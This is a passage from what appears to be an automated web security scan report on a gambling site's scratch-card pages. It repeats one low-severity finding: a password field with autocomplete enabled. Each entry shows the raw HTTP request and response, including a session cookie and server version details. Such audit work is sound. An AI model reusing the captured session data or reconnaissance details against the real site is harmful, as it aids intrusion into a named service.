Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:57 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:48:57 GMT
Connection: close
Content-Length: 102696


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.34. https://scratch.betsson.com/en/Classic/Jungle-Joy

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/Jungle-Joy

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Classic/Jungle-Joy HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:44 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:44 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:44 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:44 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:48:43 GMT
Connection: close
Content-Length: 102706


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.35. https://scratch.betsson.com/en/Classic/Neighbors

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/Neighbors

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Classic/Neighbors HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:26 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:26 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:26 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:26 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:49:25 GMT
Connection: close
Content-Length: 102688


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.36. https://scratch.betsson.com/en/Classic/Spy-Comics

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/Spy-Comics

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Classic/Spy-Comics HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:38 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:38 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:49:38 GMT
Connection: close
Content-Length: 102688


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.37. https://scratch.betsson.com/en/Classic/Super-3-Wow

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/Super-3-Wow

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Classic/Super-3-Wow HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:52 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:52 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:52 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:52 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:48:51 GMT
Connection: close
Content-Length: 102701


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.38. https://scratch.betsson.com/en/Classic/Tiger-Mahjong

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/Tiger-Mahjong

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Classic/Tiger-Mahjong HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:49 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:49 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:49 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:49 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:49:49 GMT
Connection: close
Content-Length: 102688


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.39. https://scratch.betsson.com/en/Classic/Wild-West

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/Wild-West

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Classic/Wild-West HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:04 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:04 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:04 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:04 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:49:04 GMT
Connection: close
Content-Length: 102697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.40. https://scratch.betsson.com/en/Classic/XO

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Classic/XO

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Classic/XO HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:29 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:29 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:49:29 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:49:29 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:49:29 GMT
Connection: close
Content-Length: 102701


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.41. https://scratch.betsson.com/en/Default.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Default.aspx

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Default.aspx HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:35 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:35 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:48:35 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:48:35 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:48:35 GMT
Connection: close
Content-Length: 160212


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.42. https://scratch.betsson.com/en/FAQ

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/FAQ

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/FAQ HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:49 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:49 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:49 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:49 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:50 GMT
Connection: close
Content-Length: 103308


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.43. https://scratch.betsson.com/en/Fantasy

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Fantasy HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:56:31 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:56:31 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:56:31 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:56:31 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:56:32 GMT
Connection: close
Content-Length: 102613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.44. https://scratch.betsson.com/en/Fantasy/Cash-Farm

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Cash-Farm

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Fantasy/Cash-Farm HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:59 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:59 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:59 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:59 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:51:58 GMT
Connection: close
Content-Length: 102716


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.45. https://scratch.betsson.com/en/Fantasy/Club-Pearl

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Club-Pearl

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Fantasy/Club-Pearl HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:28 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:28 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:28 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:28 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:27 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.46. https://scratch.betsson.com/en/Fantasy/Crazy-Cat

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Crazy-Cat

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Fantasy/Crazy-Cat HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:16 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:16 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:16 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:16 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:52:15 GMT
Connection: close
Content-Length: 102703


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.47. https://scratch.betsson.com/en/Fantasy/Dancing-Domino

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Dancing-Domino

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Fantasy/Dancing-Domino HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:44 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:44 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:44 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:44 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:51:43 GMT
Connection: close
Content-Length: 102711


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.48. https://scratch.betsson.com/en/Fantasy/Fast-Hands

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Fast-Hands

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Fantasy/Fast-Hands HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:07 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:07 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:07 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:07 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:52:06 GMT
Connection: close
Content-Length: 102720


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.49. https://scratch.betsson.com/en/Fantasy/Golden-Island

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Golden-Island

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Fantasy/Golden-Island HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:01 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:01 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:01 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:01 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:01 GMT
